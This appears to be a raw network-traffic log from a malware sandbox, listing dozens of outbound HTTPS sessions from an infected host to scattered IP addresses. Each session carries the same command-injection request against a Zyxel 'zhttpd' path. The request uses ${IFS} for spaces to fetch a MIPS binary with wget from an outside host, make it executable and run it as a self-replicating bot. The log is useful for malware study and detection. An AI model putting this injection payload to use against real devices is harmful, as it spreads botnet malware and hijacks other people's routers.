                                              Jan 29, 2024 07:03:42.868689060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2690192.168.2.143404278.25.196.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868719101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2691192.168.2.1435312142.98.59.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868741035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2692192.168.2.1459156129.155.20.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868798971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2693192.168.2.1437810109.73.228.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868824959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2694192.168.2.144184874.181.87.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868860006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2695192.168.2.1439022220.183.99.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868915081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2696192.168.2.1449436187.134.178.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868949890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2697192.168.2.1458318140.193.32.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868969917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2698192.168.2.1448880128.30.127.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.868992090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2699192.168.2.14589322.229.41.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869021893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2700192.168.2.144291839.240.35.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869066000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2701192.168.2.1443488123.147.10.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869096041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2702192.168.2.1448338220.183.5.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869119883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2703192.168.2.1441378107.184.237.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869157076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2704192.168.2.1433672209.108.147.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869188070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2705192.168.2.1434738128.230.215.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869227886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2706192.168.2.143339886.111.184.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869261980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2707192.168.2.1448236212.114.29.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869313002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2708192.168.2.145741434.174.135.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869332075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2709192.168.2.1437474122.243.100.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869380951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2710192.168.2.1441934121.54.6.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869420052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2711192.168.2.1438458172.209.242.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869448900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2712192.168.2.145302476.88.33.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869486094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2713192.168.2.143690680.132.202.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869514942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2714192.168.2.144362447.90.105.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869576931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2715192.168.2.1446584126.199.102.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869616985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2716192.168.2.143904451.192.203.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869641066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2717192.168.2.143453474.27.158.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869702101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2718192.168.2.1449752180.242.62.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869729042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2719192.168.2.145120297.73.63.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869774103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2720192.168.2.1436516181.75.4.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869798899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2721192.168.2.1457960155.167.165.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869842052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2722192.168.2.146042032.178.220.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869869947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2723192.168.2.1453806111.96.44.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869905949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2724192.168.2.1439198190.79.169.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869949102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2725192.168.2.1443136137.244.96.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.869990110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2726192.168.2.143572870.33.156.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870026112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2727192.168.2.1452252130.226.31.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870068073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2728192.168.2.144678461.165.169.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870096922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2729192.168.2.145507236.48.153.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870126963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2730192.168.2.143400677.185.208.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870182037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2731192.168.2.1443080108.43.120.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870233059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2732192.168.2.143411479.48.174.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870256901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2733192.168.2.143393443.248.255.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870286942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2734192.168.2.1452316199.72.54.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870348930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2735192.168.2.1445088154.247.161.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870367050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2736192.168.2.1453654131.189.52.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870402098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2737192.168.2.145255241.177.65.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870430946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2738192.168.2.144723085.6.239.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870492935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2739192.168.2.1456190193.216.211.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870516062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2740192.168.2.14475044.165.44.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870563030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2741192.168.2.1449774194.106.197.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870604038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2742192.168.2.1459622220.246.211.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870623112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2743192.168.2.144910699.47.81.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870670080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2744192.168.2.144083462.86.83.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870728016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2745192.168.2.1453906160.65.37.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870774031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2746192.168.2.144846082.72.219.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870775938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2747192.168.2.1433546137.30.202.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870817900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2748192.168.2.143741087.77.28.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870853901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2749192.168.2.1438770223.68.35.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870914936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2750192.168.2.1448202212.162.35.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870948076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2751192.168.2.146065093.29.49.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.870987892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2752192.168.2.1448094172.103.245.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:42.871036053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2753192.168.2.1436932218.1.91.142443
                                              TimestampBytes transferredDirectionData
